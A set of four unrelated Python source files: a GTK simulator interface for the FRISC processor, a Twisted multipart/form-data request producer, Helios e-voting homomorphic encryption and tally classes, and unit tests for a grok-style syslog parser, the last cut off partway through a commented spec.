import time
from gi.repository import Gtk, Gio, Gdk, Pango
from simulator import FRISCProcessor
from utils import *
# TODO: Search / go to line custom function
class SimulatorView( Gtk.Grid ):
memoryModel = Gtk.ListStore( str, str, str, int, str )
program = ''
memoryState = []
flags = { 'paused' : False, 'stopped' : True }
def __init__( self, parent, console, config ):
Gtk.Grid.__init__( self )
self.parent = parent
self.console = console
self.set_name( 'simulator-grid' )
self.simulator = FRISCProcessor( 65536 // 4 ) # TODO: Increase later, or on demand - place in settings
self.init_options()
self.init_goto_line()
self.init_memory_display()
self.init_registers_display()
def init_options( self ):
optionsBox = Gtk.ButtonBox()
optionsBox.set_orientation( Gtk.Orientation.VERTICAL )
optionsBox.set_layout( Gtk.ButtonBoxStyle.START )
optionsBox.set_name( 'options-box' )
optionsBox.set_margin_left( 20 )
optionsBox.set_margin_right( 20 )
reloadButton = Gtk.Button( 'Reload' )
icon = Gio.ThemedIcon( name = "reload" )
image = Gtk.Image.new_from_gicon( icon, Gtk.IconSize.BUTTON )
reloadButton.set_image( image )
reloadButton.set_always_show_image( True )
reloadButton.set_alignment( 0.0, 0.5 )
runButton = Gtk.Button( 'Run' )
icon = Gio.ThemedIcon( name = "media-playback-start" )
image = Gtk.Image.new_from_gicon( icon, Gtk.IconSize.BUTTON )
runButton.set_image( image )
runButton.set_always_show_image( True )
runButton.set_alignment( 0.0, 0.5 )
stepButton = Gtk.Button( 'Step' )
icon = Gio.ThemedIcon( name = "next" )
image = Gtk.Image.new_from_gicon( icon, Gtk.IconSize.BUTTON )
stepButton.set_image( image )
stepButton.set_always_show_image( True )
stepButton.set_alignment( 0.0, 0.5 )
pauseButton = Gtk.Button( 'Pause' )
icon = Gio.ThemedIcon( name = "media-playback-pause" )
image = Gtk.Image.new_from_gicon( icon, Gtk.IconSize.BUTTON )
pauseButton.set_image( image )
pauseButton.set_always_show_image( True )
pauseButton.set_alignment( 0.0, 0.5 )
stopButton = Gtk.Button( 'Stop' )
icon = Gio.ThemedIcon( name = "media-playback-stop" )
image = Gtk.Image.new_from_gicon( icon, Gtk.IconSize.BUTTON )
stopButton.set_image( image )
stopButton.set_always_show_image( True )
stopButton.set_alignment( 0.0, 0.5 )
reloadButton.connect( 'clicked', self.on_reload_click )
runButton.connect( 'clicked', self.on_run_click )
stepButton.connect( 'clicked', self.on_step_click )
pauseButton.connect( 'clicked', self.on_pause_click )
stopButton.connect( 'clicked', self.on_stop_click )
self.reloadButton = reloadButton
self.runButton = runButton
self.stepButton = stepButton
self.pauseButton = pauseButton
self.stopButton = stopButton
optionsBox.pack_start( reloadButton, True, True, 0 )
optionsBox.pack_start( runButton, True, True, 0 )
optionsBox.pack_start( stepButton, True, True, 0 )
optionsBox.pack_start( pauseButton, True, True, 0 )
optionsBox.pack_start( stopButton, True, True, 0 )
self.attach( optionsBox, 0, 1, 1, 2 )
def init_memory_display( self ):
self.memoryView = Gtk.TreeView( self.memoryModel )
self.memoryView.set_name( 'memory-view' )
self.memoryView.connect( 'row-activated', self.on_row_dblclick )
self.memoryView.set_headers_visible( False )
self.memorySelection = self.memoryView.get_selection()
self.memoryView.set_search_column( 1 )
self.memoryView.set_search_entry( self.searchEntry )
self.memoryView.set_enable_search( True )
rendererBrkPt = Gtk.CellRendererText()
rendererBrkPt.set_padding( 10, 5 )
rendererBrkPt.props.foreground = '#F83F4C'
self.memoryView.append_column( Gtk.TreeViewColumn( 'Breakpoint', rendererBrkPt, text = 0 ) )
rendererAdr = Gtk.CellRendererText()
rendererAdr.set_padding( 10, 5 )
rendererAdr.props.font = 'bold'
self.memoryView.append_column( Gtk.TreeViewColumn( 'Address', rendererAdr, text = 1 ) )
rendererContX = Gtk.CellRendererText()
rendererContX.set_padding( 20, 5 )
self.memoryView.append_column( Gtk.TreeViewColumn( 'Contents (HEX)', rendererContX, text = 2 ) )
rendererContD = Gtk.CellRendererText()
rendererContD.set_padding( 20, 5 )
self.memoryView.append_column( Gtk.TreeViewColumn( 'Contents (DEC)', rendererContD, text = 3 ) )
rendererAnn = Gtk.CellRendererText()
rendererAnn.set_padding( 10, 5 )
rendererAnn.props.foreground = '#888'
rendererAnn.props.font = 'bold'
self.memoryView.append_column( Gtk.TreeViewColumn( 'Source Code', rendererAnn, text = 4 ) )
scrollBox = Gtk.ScrolledWindow()
scrollBox.set_hexpand( True )
scrollBox.set_vexpand( True )
scrollBox.add( self.memoryView )
self.attach( scrollBox, 1, 1, 1, 1 )
def init_registers_display( self ):
registerGrid = Gtk.Grid()
registerGrid.set_margin_left( 20 )
registerGrid.set_margin_right( 20 )
registerGrid.set_name( 'register-grid' )
self.registerDisplays = []
for i in range( 0, 10 ):
box = Gtk.HBox()
box.set_name( 'register-box' )
if i == 8:
box.set_name( 'pc-box' )
box.set_margin_bottom( 1 )
label = Gtk.Label( self.simulator.get_register( i ) )
label.set_name( 'register-value' )
self.registerDisplays.append( label )
name = Gtk.Label( FRISCProcessor.get_register_name( i ) )
name.set_name( 'register-name' )
name.set_width_chars( 5 )
box.pack_start( name, True, True, 0 )
box.pack_start( self.registerDisplays[ i ], True, True, 0 )
registerGrid.attach( box, 0, i, 1, 1 )
self.attach( registerGrid, 2, 1, 1, 2 )
def init_goto_line( self ):
box = Gtk.Box()
box.set_orientation( Gtk.Orientation.HORIZONTAL )
box.set_border_width( 10 )
label = Gtk.Label( 'Go to line:' )
label.set_name( 'goto-label' )
self.searchEntry = Gtk.SearchEntry()
self.searchEntry.set_text( '00000000' )
self.searchEntry.connect( 'search-changed', self.on_search )
box.pack_start( label, False, False, 0 )
box.pack_start( self.searchEntry, True, True, 0 )
self.attach( box, 1, 0, 1, 1 )
def load_simulator( self, file ):
self.program = file
self.simulator.load_program( file )
self.memoryModel.clear()
self.memoryState = []
for i in range( 0, self.simulator.MEM_SIZE // 4 ):
self.memoryState.append( {
'line' : '{:0>8X}'.format( 4*i ),
'contents' : self.simulator.get_word_from_mem( 4*i ),
'breakpoint' : False,
'annotation' : self.simulator.annotations[ 4*i ] } )
for l in self.memoryState:
self.memoryModel.append( self.get_memory_model_values( l ) )
def on_reload_click( self, element ):
pass
def on_run_click( self, element ):
if self.is_paused(): self.flags[ 'paused' ] = False
self.runButton.set_sensitive( False )
self.pauseButton.set_sensitive( True )
while not self.is_breakpoint() and not self.is_paused() and self.run_step():
while Gtk.events_pending():
Gtk.main_iteration()
time.sleep( 0.25 )
print('iteration')
self.runButton.set_sensitive( True )
def on_step_click( self, element ):
self.run_step()
def on_pause_click( self, element ):
self.flags[ 'paused' ] = True
self.pauseButton.set_sensitive( False )
self.runButton.set_sensitive( True )
def on_stop_click( self, element ):
pass
def on_row_dblclick( self, t, p, c ):
i = int( p.to_string() )
self.toggle_breakpoint( p, i )
def on_search( self, element ):
return True
def run_step( self ):
ret = True
try:
self.simulator.run_step()
self.update_registers()
self.select_active_row()
if self.simulator.last_changed_address != -1:
self.update_memory( self.simulator.last_changed_address )
self.simulator.last_changed_address = -1
except Exception as e:
self.console.show_message( str( e ), 'error' )
# TODO: What to do on error?
ret = False
return ret
def clear_simulator( self ):
pass
def update_memory( self, i ):
c = self.memoryState[ i ][ 'contents' ] = self.simulator.get_word_from_mem( 4*( i // 4 ) )
it = self.memoryModel.get_iter_from_string( str( i // 4 ) )
self.memoryModel.set( it, [ 2, 3 ], [ bin_to_pretty_hex( c ), from32( c ) ] )
def update_registers( self ):
for i in range( 0, 10 ):
self.registerDisplays[ i ].set_text( self.simulator.get_register( i ) )
def select_active_row( self ):
pc = self.simulator.get_program_counter()
it = self.memoryModel.get_iter_from_string( str( pc // 4 - 1 ) )
self.memorySelection.select_iter( it )
def toggle_breakpoint( self, p, i ):
self.memoryState[ i ][ 'breakpoint' ] = not self.memoryState[ i ][ 'breakpoint' ]
self.memoryModel.set_value( self.memoryModel.get_iter( p ), 0,
get_breakpoint_symbol( self.memoryState[ i ][ 'breakpoint' ] ) )
def is_breakpoint( self ):
return self.memoryState[ self.simulator.get_program_counter() // 4 ][ 'breakpoint' ]
def is_paused( self ):
return self.flags[ 'paused' ]
def get_memory_model_values( self, l ):
return [ get_breakpoint_symbol( l[ 'breakpoint' ] ), l[ 'line' ],
bin_to_pretty_hex( l[ 'contents' ] ), from32( l[ 'contents' ]),
l[ 'annotation' ] ]
| |
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
from uuid import uuid4
from io import BytesIO
from contextlib import closing
from twisted.internet import defer, task
from twisted.web.iweb import UNKNOWN_LENGTH, IBodyProducer
from zope.interface import implementer
CRLF = b"\r\n"
@implementer(IBodyProducer)
class MultiPartProducer(object):
"""
L{MultiPartProducer} takes parameters for HTTP Request
produces bytes in multipart/form-data format defined
U{Multipart<http://tools.ietf.org/html/rfc2388>}
and
U{Mime format<http://tools.ietf.org/html/rfc2046>}
The encoded request is produced inncrementally and the bytes are
written to a consumer.
Fields should have form: [(parameter name, value), ...]
Accepted values:
* Unicode strings (in this case parameter will be encoded with utf-8)
* Tuples with (file name, content-type, L{IBodyProducer} objects)
Since MultiPart producer can accept L{IBodyProucer} like objects
and these objects sometimes cannot be read from in an event-driven manner
(e.g. L{FileBodyProducer} is passed in)
L{FileBodyProducer} uses a L{Cooperator} instance to schedule reads from
the undelying producers. This process is also paused and resumed based
on notifications from the L{IConsumer} provider being written to.
@ivar _fileds: Sorted parameters, where all strings are enforced to be
unicode and file objects stacked on bottom (to produce a human readable
form-data request)
@ivar _cooperate: A method like L{Cooperator.cooperate} which is used to
schedule all reads.
@ivar boundary: The generated boundary used in form-data encoding
@ivar boundary: The generated boundary used in form-data encoding
"""
def __init__(self, fields, boundary=None, cooperator=task):
self._fields = list(_sorted_by_type(_converted(fields)))
self._currentProducer = None
self._cooperate = cooperator.cooperate
self.boundary = boundary or uuid4().hex
self.length = self._calculateLength()
def startProducing(self, consumer):
"""
Start a cooperative task which will read bytes from the input file and
write them to C{consumer}. Return a L{Deferred} which fires after all
bytes have been written.
@param consumer: Any L{IConsumer} provider
"""
self._task = self._cooperate(self._writeLoop(consumer))
d = self._task.whenDone()
def maybeStopped(reason):
reason.trap(task.TaskStopped)
return defer.Deferred()
d.addCallbacks(lambda ignored: None, maybeStopped)
return d
def stopProducing(self):
"""
Permanently stop writing bytes from the file to the consumer by
stopping the underlying L{CooperativeTask}.
"""
if self._currentProducer:
self._currentProducer.stopProducing()
self._task.stop()
def pauseProducing(self):
"""
Temporarily suspend copying bytes from the input file to the consumer
by pausing the L{CooperativeTask} which drives that activity.
"""
if self._currentProducer:
# Having a current producer means that we are in
# the paused state because we've returned
# the deferred of the current producer to the
# the cooperator. So this request
# for pausing us is actually a request to pause
# our underlying current producer.
self._currentProducer.pauseProducing()
else:
self._task.pause()
def resumeProducing(self):
"""
Undo the effects of a previous C{pauseProducing} and resume copying
bytes to the consumer by resuming the L{CooperativeTask} which drives
the write activity.
"""
if self._currentProducer:
self._currentProducer.resumeProducing()
else:
self._task.resume()
def _calculateLength(self):
"""
Determine how many bytes the overall form post would consume.
The easiest way is to calculate is to generate of C{fObj}
(assuming it is not modified from this point on).
If the determination cannot be made, return C{UNKNOWN_LENGTH}.
"""
consumer = _LengthConsumer()
for i in self._writeLoop(consumer):
pass
return consumer.length
def _getBoundary(self, final=False):
"""
Returns a boundary line, either final (the one that ends the
form data request or a regular, the one that separates the boundaries)
--this-is-my-boundary
"""
return b"--%s%s" % (
self.boundary, b"--" if final else b"")
def _writeLoop(self, consumer):
"""
Return an iterator which generates the multipart/form-data
request including the encoded objects
and writes them to the consumer for each time it is iterated.
"""
for index, (name, value) in enumerate(self._fields):
# We don't write the CRLF of the first boundary:
# HTTP request headers are already separated with CRLF
# from the request body, another newline is possible
# and should be considered as an empty preamble per rfc2046,
# but is generally confusing, so we omit it when generating
# the request. We don't write Content-Type: multipart/form-data
# header here as well as it's defined in the context of the HTTP
# request headers, not the producer, so we gust generate
# the body.
# It's also important to note that the boundary in the message
# is defined not only by "--boundary-value" but
# but with CRLF characers before it and after the line.
# This is very important.
# proper boundary is "CRLF--boundary-valueCRLF"
consumer.write(
(CRLF if index != 0 else "") + self._getBoundary() + CRLF)
yield self._writeField(name, value, consumer)
consumer.write(CRLF + self._getBoundary(final=True) + CRLF)
def _writeField(self, name, value, consumer):
if isinstance(value, unicode):
self._writeString(name, value, consumer)
elif isinstance(value, tuple):
filename, content_type, producer = value
return self._writeFile(
name, filename, content_type, producer, consumer)
def _writeString(self, name, value, consumer):
cdisp = _Header("Content-Disposition", "form-data")
cdisp.add_param("name", name)
consumer.write(str(cdisp) + CRLF + CRLF)
encoded = value.encode("utf-8")
consumer.write(encoded)
self._currentProducer = None
def _writeFile(self, name, filename, content_type, producer, consumer):
cdisp = _Header("Content-Disposition", "form-data")
cdisp.add_param("name", name)
if filename:
cdisp.add_param("filename", filename)
consumer.write(str(cdisp) + CRLF)
consumer.write(str(_Header("Content-Type", content_type)) + CRLF)
if producer.length != UNKNOWN_LENGTH:
consumer.write(
str(_Header("Content-Length", producer.length)) + CRLF)
consumer.write(CRLF)
if isinstance(consumer, _LengthConsumer):
consumer.write(producer.length)
else:
self._currentProducer = producer
def unset(val):
self._currentProducer = None
return val
d = producer.startProducing(consumer)
d.addCallback(unset)
return d
def _escape(value):
"""
This function prevents header values from corrupting the request,
a newline in the file name parameter makes form-data request unreadable
for majority of parsers.
"""
if not isinstance(value, (str, unicode)):
value = unicode(value)
return value.replace(u"\r", u"").replace(u"\n", u"").replace(u'"', u'\\"')
def _enforce_unicode(value):
"""
This function enforces the stings passed to be unicode, so we won't
need to guess what's the encoding of the binary strings passed in.
If someone needs to pass the binary string, use BytesIO and wrap it with
L{FileBodyProducer}
"""
if isinstance(value, unicode):
return value
elif isinstance(value, str):
# we got a byte string, and we have no ide what's the encoding of it
# we can only assume that it's something cool
try:
return unicode(value, "utf-8")
except UnicodeDecodeError:
raise ValueError(
"Supplied raw bytes that are not ascii/utf-8."
" When supplying raw string make sure it's ascii or utf-8"
", or work with unicode if you are not sure")
else:
raise ValueError(
"Unsupported field type: %s" % (value.__class__.__name__,))
def _converted(fields):
if hasattr(fields, "iteritems"):
fields = fields.iteritems()
for name, value in fields:
name = _enforce_unicode(name)
if isinstance(value, (tuple, list)):
if len(value) != 3:
raise ValueError(
"Expected tuple: (filename, content type, producer)")
filename, content_type, producer = value
filename = _enforce_unicode(filename) if filename else None
yield name, (filename, content_type, producer)
elif isinstance(value, (str, unicode)):
yield name, _enforce_unicode(value)
else:
raise ValueError(
"Unsupported value, expected string, unicode "
"or tuple (filename, content type, IBodyProducer)")
class _LengthConsumer(object):
"""
L{_LengthConsumer} is used to calculate the length of the multi-part
request. The easiest way to do that is to consume all the fields,
but instead writing them to the string just accumulate the request
length.
@ivar length: The length of the request. Can be UNKNOWN_LENGTH
if consumer finds the field that has length that can not be calculated
"""
def __init__(self):
self.length = 0
def write(self, value):
# this means that we have encountered
# unknown length producer
# so we need to stop attempts calculating
if self.length is UNKNOWN_LENGTH:
return
if value is UNKNOWN_LENGTH:
self.length = value
elif isinstance(value, (int, long)):
self.length += value
else:
self.length += len(value)
class _Header(object):
"""
L{_Header} This class is a tiny wrapper that produces
request headers. We can't use standard python header
class because it encodes unicode fields using =? bla bla ?=
encoding, which is correct, but no one in HTTP world expects
that, everyone wants utf-8 raw bytes.
"""
def __init__(self, name, value, params=None):
self.name = name
self.value = value
self.params = params or []
def add_param(self, name, value):
self.params.append((name, value))
def __str__(self):
with closing(BytesIO()) as h:
h.write(b"%s: %s" % (
self.name, _escape(self.value).encode("us-ascii")))
if self.params:
for (name, val) in self.params:
h.write("; ")
h.write(_escape(name).encode("us-ascii"))
h.write("=")
h.write(b'"%s"' % (_escape(val).encode('utf-8'),))
h.seek(0)
return h.read()
def _sorted_by_type(fields):
"""Sorts params so that strings are placed before files.
That makes a request more readable, as generally files are bigger.
It also provides deterministic order of fields what is easier for testing.
"""
def key(p):
key, val = p
if isinstance(val, (str, unicode)):
return (0, key)
else:
return (1, key)
return sorted(fields, key=key)
| |
"""
homomorphic workflow and algorithms for Helios
Ben Adida
2008-08-30
reworked 2011-01-09
"""
from helios.crypto import algs, utils
import logging
import uuid
import datetime
from helios import models
from . import WorkflowObject
class EncryptedAnswer(WorkflowObject):
"""
An encrypted answer to a single election question
"""
def __init__(self, choices=None, individual_proofs=None, overall_proof=None, randomness=None, answer=None):
self.choices = choices
self.individual_proofs = individual_proofs
self.overall_proof = overall_proof
self.randomness = randomness
self.answer = answer
@classmethod
def generate_plaintexts(cls, pk, min=0, max=1):
plaintexts = []
running_product = 1
# run the product up to the min
for i in range(max+1):
# if we're in the range, add it to the array
if i >= min:
plaintexts.append(algs.EGPlaintext(running_product, pk))
# next value in running product
running_product = (running_product * pk.g) % pk.p
return plaintexts
def verify_plaintexts_and_randomness(self, pk):
"""
this applies only if the explicit answers and randomness factors are given
we do not verify the proofs here, that is the verify() method
"""
if not hasattr(self, 'answer'):
return False
for choice_num in range(len(self.choices)):
choice = self.choices[choice_num]
choice.pk = pk
# redo the encryption
# WORK HERE (paste from below encryption)
return False
def verify(self, pk, min=0, max=1):
possible_plaintexts = self.generate_plaintexts(pk)
homomorphic_sum = 0
for choice_num in range(len(self.choices)):
choice = self.choices[choice_num]
choice.pk = pk
individual_proof = self.individual_proofs[choice_num]
# verify the proof on the encryption of that choice
if not choice.verify_disjunctive_encryption_proof(possible_plaintexts, individual_proof, algs.EG_disjunctive_challenge_generator):
return False
# compute homomorphic sum if needed
if max != None:
homomorphic_sum = choice * homomorphic_sum
if max != None:
# determine possible plaintexts for the sum
sum_possible_plaintexts = self.generate_plaintexts(pk, min=min, max=max)
# verify the sum
return homomorphic_sum.verify_disjunctive_encryption_proof(sum_possible_plaintexts, self.overall_proof, algs.EG_disjunctive_challenge_generator)
else:
# approval voting, no need for overall proof verification
return True
@classmethod
def fromElectionAndAnswer(cls, election, question_num, answer_indexes):
"""
Given an election, a question number, and a list of answers to that question
in the form of an array of 0-based indexes into the answer array,
produce an EncryptedAnswer that works.
"""
question = election.questions[question_num]
answers = question['answers']
pk = election.public_key
# initialize choices, individual proofs, randomness and overall proof
choices = [None for a in range(len(answers))]
individual_proofs = [None for a in range(len(answers))]
overall_proof = None
randomness = [None for a in range(len(answers))]
# possible plaintexts [0, 1]
plaintexts = cls.generate_plaintexts(pk)
# keep track of number of options selected.
num_selected_answers = 0;
# homomorphic sum of all
homomorphic_sum = 0
randomness_sum = 0
# min and max for number of answers, useful later
min_answers = 0
if question.has_key('min'):
min_answers = question['min']
max_answers = question['max']
# go through each possible answer and encrypt either a g^0 or a g^1.
for answer_num in range(len(answers)):
plaintext_index = 0
# assuming a list of answers
if answer_num in answer_indexes:
plaintext_index = 1
num_selected_answers += 1
# randomness and encryption
randomness[answer_num] = algs.Utils.random_mpz_lt(pk.q)
choices[answer_num] = pk.encrypt_with_r(plaintexts[plaintext_index], randomness[answer_num])
# generate proof
individual_proofs[answer_num] = choices[answer_num].generate_disjunctive_encryption_proof(plaintexts, plaintext_index,
randomness[answer_num], algs.EG_disjunctive_challenge_generator)
# sum things up homomorphically if needed
if max_answers != None:
homomorphic_sum = choices[answer_num] * homomorphic_sum
randomness_sum = (randomness_sum + randomness[answer_num]) % pk.q
# prove that the sum is 0 or 1 (can be "blank vote" for this answer)
# num_selected_answers is 0 or 1, which is the index into the plaintext that is actually encoded
if num_selected_answers < min_answers:
raise Exception("Need to select at least %s answer(s)" % min_answers)
if max_answers != None:
sum_plaintexts = cls.generate_plaintexts(pk, min=min_answers, max=max_answers)
# need to subtract the min from the offset
overall_proof = homomorphic_sum.generate_disjunctive_encryption_proof(sum_plaintexts, num_selected_answers - min_answers, randomness_sum, algs.EG_disjunctive_challenge_generator);
else:
# approval voting
overall_proof = None
return cls(choices, individual_proofs, overall_proof, randomness, answer_indexes)
# WORK HERE
class EncryptedVote(WorkflowObject):
"""
An encrypted ballot
"""
def __init__(self):
self.encrypted_answers = None
@property
def datatype(self):
# FIXME
return "legacy/EncryptedVote"
def _answers_get(self):
return self.encrypted_answers
def _answers_set(self, value):
self.encrypted_answers = value
answers = property(_answers_get, _answers_set)
def verify(self, election):
# right number of answers
if len(self.encrypted_answers) != len(election.questions):
return False
# check hash
if self.election_hash != election.hash:
# print "%s / %s " % (self.election_hash, election.hash)
return False
# check ID
if self.election_uuid != election.uuid:
return False
# check proofs on all of answers
for question_num in range(len(election.questions)):
ea = self.encrypted_answers[question_num]
question = election.questions[question_num]
min_answers = 0
if question.has_key('min'):
min_answers = question['min']
if not ea.verify(election.public_key, min=min_answers, max=question['max']):
return False
return True
@classmethod
def fromElectionAndAnswers(cls, election, answers):
pk = election.public_key
# each answer is an index into the answer array
encrypted_answers = [EncryptedAnswer.fromElectionAndAnswer(election, answer_num, answers[answer_num]) for answer_num in range(len(answers))]
return_val = cls()
return_val.encrypted_answers = encrypted_answers
return_val.election_hash = election.hash
return_val.election_uuid = election.uuid
return return_val
class DLogTable(object):
"""
Keeping track of discrete logs
"""
def __init__(self, base, modulus):
self.dlogs = {}
self.dlogs[1] = 0
self.last_dlog_result = 1
self.counter = 0
self.base = base
self.modulus = modulus
def increment(self):
self.counter += 1
# new value
new_value = (self.last_dlog_result * self.base) % self.modulus
# record the discrete log
self.dlogs[new_value] = self.counter
# record the last value
self.last_dlog_result = new_value
def precompute(self, up_to):
while self.counter < up_to:
self.increment()
def lookup(self, value):
return self.dlogs.get(value, None)
class Tally(WorkflowObject):
"""
A running homomorphic tally
"""
@property
def datatype(self):
return "legacy/Tally"
def __init__(self, *args, **kwargs):
super(Tally, self).__init__()
election = kwargs.get('election',None)
self.tally = None
self.num_tallied = 0
if election:
self.init_election(election)
self.tally = [[0 for a in q['answers']] for q in self.questions]
else:
self.questions = None
self.public_key = None
self.tally = None
def init_election(self, election):
"""
given the election, initialize some params
"""
self.election = election
self.questions = election.questions
self.public_key = election.public_key
def add_vote_batch(self, encrypted_votes, verify_p=True):
"""
Add a batch of votes. Eventually, this will be optimized to do an aggregate proof verification
rather than a whole proof verif for each vote.
"""
for vote in encrypted_votes:
self.add_vote(vote, verify_p)
def add_vote(self, encrypted_vote, verify_p=True):
# do we verify?
if verify_p:
if not encrypted_vote.verify(self.election):
raise Exception('Bad Vote')
# for each question
for question_num in range(len(self.questions)):
question = self.questions[question_num]
answers = question['answers']
# for each possible answer to each question
for answer_num in range(len(answers)):
# do the homomorphic addition into the tally
enc_vote_choice = encrypted_vote.encrypted_answers[question_num].choices[answer_num]
enc_vote_choice.pk = self.public_key
self.tally[question_num][answer_num] = encrypted_vote.encrypted_answers[question_num].choices[answer_num] * self.tally[question_num][answer_num]
self.num_tallied += 1
def decryption_factors_and_proofs(self, sk):
"""
returns an array of decryption factors and a corresponding array of decryption proofs.
makes the decryption factors into strings, for general Helios / JS compatibility.
"""
# for all choices of all questions (double list comprehension)
decryption_factors = []
decryption_proof = []
for question_num, question in enumerate(self.questions):
answers = question['answers']
question_factors = []
question_proof = []
for answer_num, answer in enumerate(answers):
# do decryption and proof of it
dec_factor, proof = sk.decryption_factor_and_proof(self.tally[question_num][answer_num])
# look up appropriate discrete log
# this is the string conversion
question_factors.append(dec_factor)
question_proof.append(proof)
decryption_factors.append(question_factors)
decryption_proof.append(question_proof)
return decryption_factors, decryption_proof
def decrypt_and_prove(self, sk, discrete_logs=None):
"""
returns an array of tallies and a corresponding array of decryption proofs.
"""
# who's keeping track of discrete logs?
if not discrete_logs:
discrete_logs = self.discrete_logs
# for all choices of all questions (double list comprehension)
decrypted_tally = []
decryption_proof = []
for question_num in range(len(self.questions)):
question = self.questions[question_num]
answers = question['answers']
question_tally = []
question_proof = []
for answer_num in range(len(answers)):
# do decryption and proof of it
plaintext, proof = sk.prove_decryption(self.tally[question_num][answer_num])
# look up appropriate discrete log
question_tally.append(discrete_logs[plaintext])
question_proof.append(proof)
decrypted_tally.append(question_tally)
decryption_proof.append(question_proof)
return decrypted_tally, decryption_proof
def verify_decryption_proofs(self, decryption_factors, decryption_proofs, public_key, challenge_generator):
"""
decryption_factors is a list of lists of dec factors
decryption_proofs are the corresponding proofs
public_key is, of course, the public key of the trustee
"""
# go through each one
for q_num, q in enumerate(self.tally):
for a_num, answer_tally in enumerate(q):
# parse the proof
#proof = algs.EGZKProof.fromJSONDict(decryption_proofs[q_num][a_num])
proof = decryption_proofs[q_num][a_num]
# check that g, alpha, y, dec_factor is a DH tuple
if not proof.verify(public_key.g, answer_tally.alpha, public_key.y, int(decryption_factors[q_num][a_num]), public_key.p, public_key.q, challenge_generator):
return False
return True
def decrypt_from_factors(self, decryption_factors, public_key):
"""
decrypt a tally given decryption factors
The decryption factors are a list of decryption factor sets, for each trustee.
Each decryption factor set is a list of lists of decryption factors (questions/answers).
"""
# pre-compute a dlog table
dlog_table = DLogTable(base = public_key.g, modulus = public_key.p)
dlog_table.precompute(self.num_tallied)
result = []
# go through each one
for q_num, q in enumerate(self.tally):
q_result = []
for a_num, a in enumerate(q):
# coalesce the decryption factors into one list
dec_factor_list = [df[q_num][a_num] for df in decryption_factors]
raw_value = self.tally[q_num][a_num].decrypt(dec_factor_list, public_key)
q_result.append(dlog_table.lookup(raw_value))
result.append(q_result)
return result
def _process_value_in(self, field_name, field_value):
if field_name == 'tally':
return [[algs.EGCiphertext.fromJSONDict(a) for a in q] for q in field_value]
def _process_value_out(self, field_name, field_value):
if field_name == 'tally':
return [[a.toJSONDict() for a in q] for q in field_value]
| |
from nose.tools import istest as test
from nose.tools import nottest
from pyvows import Vows, expect
from korg.korg import LineGrokker
from korg.pattern import PatternRepo
# test samples taken from logstash/spec/filters/grok.rb v1.1.13
@Vows.create_assertions
def has_element(topic, expected):
return expected in topic
@Vows.create_assertions
def not_has_element(topic, expected):
return not(expected in topic)
# describe korg
@test
def it_groks_simple_syslog_line():
pr = PatternRepo(['patterns/'])
g = LineGrokker('%{SYSLOGLINE}', pr)
subject = g.grok('Mar 16 00:01:25 evita postfix/smtpd[1713]: connect from camomile.cloud9.net[168.100.1.3]')
print 'subject: %s' % subject
expect(subject["logsource"]).to_equal("evita")
expect(subject["timestamp"]).to_equal("Mar 16 00:01:25")
expect(subject["message"]).to_equal("connect from camomile.cloud9.net[168.100.1.3]")
expect(subject["program"]).to_equal("postfix/smtpd")
expect(subject["pid"]).to_equal("1713")
# reject { subject["@tags"] }.include?("_grokparsefailure")
@test
def it_groks_ietf_5424_syslog_line():
pr = PatternRepo(['patterns/'])
g = LineGrokker('%{SYSLOG5424LINE}', pr)
subject = g.grok('<191>1 2009-06-30T18:30:00+02:00 paxton.local grokdebug 4123 - [id1 foo=\"bar\"][id2 baz=\"something\"] Hello, syslog.')
print 'subject: %s' % subject
expect(subject["syslog5424_pri"]).to_equal("<191>")
expect(subject["syslog5424_ver"]).to_equal("1")
expect(subject["syslog5424_ts"]).to_equal("2009-06-30T18:30:00+02:00")
expect(subject["syslog5424_host"]).to_equal("paxton.local")
expect(subject["syslog5424_app"]).to_equal("grokdebug")
expect(subject["syslog5424_proc"]).to_equal("4123")
expect(subject["syslog5424_msgid"]).to_equal(None)
expect(subject["syslog5424_sd"]).to_equal("[id1 foo=\"bar\"][id2 baz=\"something\"]")
expect(subject["syslog5424_msg"]).to_equal("Hello, syslog.")
"""
describe "parsing an event with multiple messages (array of strings)" do
config <<-CONFIG
filter {
grok {
pattern => "(?:hello|world) %{NUMBER}"
named_captures_only => false
}
}
CONFIG
sample({ "@message" => [ "hello 12345", "world 23456" ] }) do
insist { subject["NUMBER"] } == [ "12345", "23456" ]
end
end
describe "coercing matched values" do
config <<-CONFIG
filter {
grok {
pattern => "%{NUMBER:foo:int} %{NUMBER:bar:float}"
singles => true
}
}
CONFIG
sample "400 454.33" do
insist { subject["foo"] } == 400
insist { subject["foo"] }.is_a?(Fixnum)
insist { subject["bar"] } == 454.33
insist { subject["bar"] }.is_a?(Float)
end
end
describe "in-line pattern definitions" do
config <<-CONFIG
filter {
grok {
pattern => "%{FIZZLE=\\d+}"
named_captures_only => false
singles => true
}
}
CONFIG
sample "hello 1234" do
insist { subject["FIZZLE"] } == "1234"
end
end
describe "processing fields other than @message" do
config <<-CONFIG
filter {
grok {
pattern => "%{WORD:word}"
match => [ "examplefield", "%{NUMBER:num}" ]
break_on_match => false
singles => true
}
}
CONFIG
sample({ "@message" => "hello world", "@fields" => { "examplefield" => "12345" } }) do
insist { subject["examplefield"] } == "12345"
insist { subject["word"] } == "hello"
end
end
describe "adding fields on match" do
config <<-CONFIG
filter {
grok {
pattern => "matchme %{NUMBER:fancy}"
singles => true
add_field => [ "new_field", "%{fancy}" ]
}
}
CONFIG
sample "matchme 1234" do
reject { subject["@tags"] }.include?("_grokparsefailure")
insist { subject["new_field"] } == ["1234"]
end
sample "this will not be matched" do
insist { subject["@tags"] }.include?("_grokparsefailure")
reject { subject }.include?("new_field")
end
end
"""
# empty fields
@nottest
def it_drops_empty_fields_by_default():
# not implemented
pr = PatternRepo(['patterns/'])
g = LineGrokker('1=%{WORD:foo1} *(2=%{WORD:foo2})?', pr)
subject = g.grok('1=test')
expect(subject).has_element("foo1")
# Since 'foo2' was not captured, it must not be present in the event.
expect(subject).not_has_element("foo2")
@test
def it_keep_empty_fields():
pr = PatternRepo(['patterns/'])
g = LineGrokker('1=%{WORD:foo1} *(2=%{WORD:foo2})?', pr)
subject = g.grok('1=test')
expect(subject).has_element("foo1")
# Since 'foo2' was not captured, it must not be present in the event.
expect(subject).has_element("foo2")
expect(subject["foo2"]).to_equal(None)
"""
describe "when named_captures_only == false" do
config <<-CONFIG
filter {
grok {
pattern => "Hello %{WORD}. %{WORD:foo}"
named_captures_only => false
singles => true
}
}
CONFIG
sample "Hello World, yo!" do
insist { subject }.include?("WORD")
insist { subject["WORD"] } == "World"
